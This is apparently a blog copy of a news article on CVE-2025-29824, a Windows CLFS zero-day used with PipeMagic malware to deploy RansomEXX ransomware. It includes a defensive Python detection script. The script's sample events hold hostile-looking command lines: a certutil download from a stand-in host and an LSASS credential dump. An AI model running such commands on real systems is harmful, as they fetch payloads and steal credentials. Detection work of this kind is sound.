Windows CLFS Vulnerability Could Lead to ‘Widespread Deployment and Detonation of Ransomware’


Microsoft has detected a zero-day vulnerability in the Windows Common Log File System (CLFS) being exploited in the wild to deploy ransomware. Target industries include IT, real estate, finance, software, and retail, with companies based in the US, Spain, Venezuela, and Saudi Arabia.

The vulnerability, tracked as CVE-2025-29824 and rated “important,” is present in the CLFS kernel driver. It allows an attacker who already has standard user access to a system to escalate their local privileges. The attacker can then use their privileged access for “widespread deployment and detonation of ransomware within an environment,” according to a blog post by the Microsoft Threat Intelligence Center.

The CLFS driver is a key component of Windows used to write transaction logs, and its misuse could let an attacker gain SYSTEM privileges. From there, they could steal data or install backdoors. Microsoft often uncovers privilege escalation flaws in CLFS, the last one being patched in December.

In instances of CVE-2025-29824 exploitation observed by Microsoft, the so-called “PipeMagic” malware was deployed before the attackers could exploit the vulnerability to escalate their privileges. PipeMagic gives attackers remote control over a system and lets them run commands or install more malicious tools.


Who’s behind the exploitation?

Microsoft has identified Storm-2460 as the threat actor exploiting this vulnerability with PipeMagic and ransomware, linking it to the RansomEXX group.

Once known as Defray777, the attackers came onto the scene in 2018. They have since targeted high-profile organisations such as the Texas Department of Transportation, the Brazilian government, and Taiwanese hardware manufacturer GIGABYTE. The group has been linked to Russian nationals.

The US’s cyber agency has added the 7.8-rated vulnerability to its Known Exploited Vulnerabilities list, meaning that federal civilian agencies are required to apply the patch by April 29.

Windows 10, Windows 11, and Windows Server are vulnerable

On April 8, security updates were released to patch the vulnerability in Windows 11, Windows Server 2022, and Windows Server 2019. Windows 10 x64-based and 32-bit systems are still awaiting fixes, but Redmond says they will be released “as soon as possible,” and “customers will be notified via a revision to this CVE information” as soon as they are.

Devices running Windows 11 version 24H2 or newer cannot be exploited this way, even if the vulnerability exists. Access to the required system information is restricted to users with the “SeDebugPrivilege” permission, a level of access typically unavailable to standard users.

How exploitation works

Microsoft observed threat actors using the certutil command-line utility to download a malicious MSBuild file onto the victim’s system.

This file, which carried an encrypted PipeMagic payload, was available on a once-legitimate third-party website that had been compromised to host the threat actor’s malware. One domain PipeMagic communicated to was aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which has now been disabled.

Once PipeMagic was decrypted and run in memory, the attackers used a dllhost.exe process to leak kernel addresses, or memory locations, to user mode. They overwrote the process’s token, which defines what the process is allowed to do, with the value 0xFFFFFFFF, granting it full privileges and allowing the attackers to inject code into SYSTEM-level processes.

Next, they injected a payload into the SYSTEM winlogon.exe process, which subsequently injected the Sysinternals procdump.exe tool into another dllhost.exe process and executed it. This enabled the threat actor to dump the memory of LSASS, a process that contains user credentials.

Following credential theft, ransomware was deployed. Microsoft observed files being encrypted, a random extension added, and a ransom note named !_READ_ME_REXX2_!.txt dropped on affected systems.
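
For defenders, the stages described above map onto ordinary endpoint telemetry. The following triage sketch is an added example, not code from Microsoft or from this article; the event schema, host names, paths and download URL are constructed assumptions, while the domain and ransom note name are the ones quoted above.

```python
import re

# Indicators quoted in the article; the domain is refanged only for matching.
C2_DOMAIN = "aaaaabbbbbbb.eastus.cloudapp.azure[.]com".replace("[.]", ".")
RANSOM_NOTE = "!_READ_ME_REXX2_!.txt"
URL_RE = re.compile(r"https?://", re.I)
DUMP_FLAGS = {"-ma", "/ma", "-mm", "/mm"}  # ProcDump full/mini dump switches

def basename(path):
    return path.rsplit("\\", 1)[-1]

def classify(ev):
    """Map one telemetry event to a finding label, or None if nothing matches."""
    if ev["type"] == "process":
        cmd = ev["cmdline"].lower()
        if basename(ev["image"]).lower() == "certutil.exe" and URL_RE.search(cmd):
            return "certutil-download"
        # Match on arguments, not image name: the dump tool ran inside dllhost.exe.
        if "lsass" in cmd and DUMP_FLAGS & set(cmd.split()):
            return "lsass-dump"
    elif ev["type"] == "file" and basename(ev["path"]) == RANSOM_NOTE:
        return "ransom-note"
    elif ev["type"] == "dns" and ev["query"].lower().rstrip(".") == C2_DOMAIN:
        return "pipemagic-c2"
    return None

def triage(events):
    """Return {host: (severity, [labels in time order])} for hosts with findings."""
    hits = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        label = classify(ev)
        if label:
            hits.setdefault(ev["host"], []).append(label)
    rank = [("ransom-note", "critical"), ("lsass-dump", "high")]
    return {h: (next((s for l, s in rank if l in ls), "medium"), ls)
            for h, ls in hits.items()}

# Constructed sample events (not real telemetry); the schema is hypothetical.
DLLHOST = r"C:\Windows\System32\dllhost.exe"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
SAMPLE = [
    {"ts": 3, "host": "WS01", "type": "process", "image": DLLHOST,
     "cmdline": DLLHOST + r" -accepteula -ma lsass.exe C:\ProgramData\x.dmp"},
    {"ts": 1, "host": "WS01", "type": "process", "image": CERTUTIL,
     "cmdline": "certutil -urlcache -f http://compromised.example/a.proj a.proj"},
    {"ts": 2, "host": "WS01", "type": "dns", "query": C2_DOMAIN},
    {"ts": 4, "host": "WS01", "type": "file", "path": "C:\\Users\\a\\" + RANSOM_NOTE},
    {"ts": 1, "host": "WS02", "type": "process", "image": CERTUTIL,
     "cmdline": "certutil -hashfile setup.exe SHA256"},
    {"ts": 2, "host": "WS03", "type": "process", "image": CERTUTIL,
     "cmdline": "certutil -urlcache -f https://compromised.example/b.proj b.proj"},
]
```

Calling `triage(SAMPLE)` orders the findings per host by timestamp, so a host that shows the download, the C2 lookup, the LSASS dump and the ransom note in sequence stands out from one that only ran certutil for hashing.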

roosho Senior Engineer (Technical Services)
I am Rakib Raihan RooSho, Jack of all IT Trades. You got it right. Good for nothing. I try a lot of things and fail more than that. That's how I learn. Whenever I succeed, I note that in my cookbook. Eventually, that became my blog. 